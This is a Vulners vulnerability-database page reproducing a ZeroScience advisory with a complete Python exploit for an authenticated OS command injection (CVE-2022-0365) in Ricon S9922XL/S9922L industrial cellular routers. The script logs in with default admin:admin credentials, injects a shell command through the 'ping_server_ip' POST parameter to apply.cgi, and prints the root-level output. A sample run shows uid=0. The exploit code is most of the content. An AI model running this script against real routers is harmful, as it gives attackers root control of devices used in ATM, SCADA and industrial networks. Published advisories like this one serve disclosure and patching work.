Vulners
Lucene search
Ricon Industrial Cellular Router S9922XL Remote Command Execution
šļøĀ 04 Jul 2021Ā 00:00:00Reported byĀ Gjoko KrsticTypeĀ 
Ā zerosciencešĀ www.zeroscience.mkšĀ 448Ā Views
| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
 | CVE-2022-0365 | 16 Apr 202516:56 | ā | circl |
 | Ricon Industrial Cellular Router S9922L ęä½ē³»ē»å½ä»¤ę³Øå „ę¼ę“ | 1 Feb 202200:00 | ā | cnnvd |
 | Ricon Mobile Ricon Industrial Cellular Router S9922L and S9922XL OS Command Injection Vulnerability | 10 Feb 202200:00 | ā | cnvd |
 | CVE-2022-0365 | 4 Feb 202222:29 | ā | cve |
 | CVE-2022-0365 Ricon Mobile, Inc. | 4 Feb 202222:29 | ā | cvelist |
 | EUVD-2022-15520 | 3 Oct 202520:07 | ā | euvd |
 | Ricon Mobile Industrial Cellular Router | 1 Feb 202200:00 | ā | ics |
 | CVE-2022-0365 | 4 Feb 202223:15 | ā | nvd |
 | CVE-2022-0365 | 4 Feb 202223:15 | ā | osv |
 | Command injection | 4 Feb 202223:15 | ā | prion |
10
<html><body><p>#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
#
# Ricon Industrial Cellular Router S9922XL Remote Command Execution
#
#
# Vendor: Ricon Mobile Inc.
# Product web page: https://www.riconmobile.com
# Affected version: Model: S9922XL and S9922L
# Firmware: 16.10.3
#
# Summary: S9922L series LTE router is designed and manufactured by
# Ricon Mobile Inc., it based on 3G/LTE cellular network technology
# with industrial class quality. With its embedded cellular module,
# it widely used in multiple case like ATM connection, remote office
# security connection, data collection, etc.
#
# The S9922XL-LTE is a mobile network router based on 4G/4.5G, WiFi
# and VPN technologies. Powerful 64-bit Processor and integrated real-time
# operating system specially developed by Ricon Mobile. S9922XL is
# widely used in many areas such as intelligent transportation, scada,
# POS, industrial automation, telemetry, finance, environmental protection.
#
# Desc: The router suffers from an authenticated OS command injection
# vulnerability. This can be exploited to inject and execute arbitrary
# shell commands as the admin (root) user via the 'ping_server_ip' POST
# parameter. Also vulnerable to Heartbleed.
#
# --------------------------------------------------------------------
# C:\>python ricon.py 192.168.1.71 id
# uid=0(admin) gid=0(admin)
# --------------------------------------------------------------------
#
# Tested on: GNU/Linux 2.6.36 (mips)
# WEB-ROUTER
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2021-5653
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5653.php
#
#
# 02.07.2021
#
import requests,sys,re
if len(sys.argv)<3:
print("Ricon Industrial Routers RCE")
print("Usage: ./ricon.py [ip] [cmd]")
sys.exit(17)
else:
ipaddr=sys.argv[1]
execmd=sys.argv[2]
data={'submit_class' :'admin',
'submit_button' :'netTest',
'submit_type' :'',
'action' :'Apply',
'change_action' :'',
'is_ping' :'0',
'ping_server_ip':';'+execmd}
htreq=requests.post('http://'+ipaddr+'/apply.cgi',data=data,auth=('admin','admin'))
htreq=requests.get('http://'+ipaddr+'/asp/admin/netTest.asp',auth=('admin','admin'))
reout=re.search("20\">(.*)",htreq.text,flags=re.S).group(1).strip('\n')
print(reout)
</p></body></html>Data
Build on a solid foundation withĀ Vulners data
WeĀ provide theĀ essential building blocks forĀ cybersecurity solutions withĀ comprehensive, structured, andĀ constantly updated vulnerability andĀ exploits data
Api
Power your application withĀ Vulners API
The Vulners REST API offers reliable, high-performance access toĀ vulnerabilityĀ intelligence, withĀ 99.9%Ā SLAĀ uptime andĀ CDN-backed data delivery forĀ seamlessĀ global access
App
Assess and manage vulnerabilities withĀ VulnersĀ tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Jul 2021 00:00Current
7.6High risk
Vulners AI Score7.6
CVSS 3.19.1 - 9.8
CVSS 210
EPSS0.02419
SSVC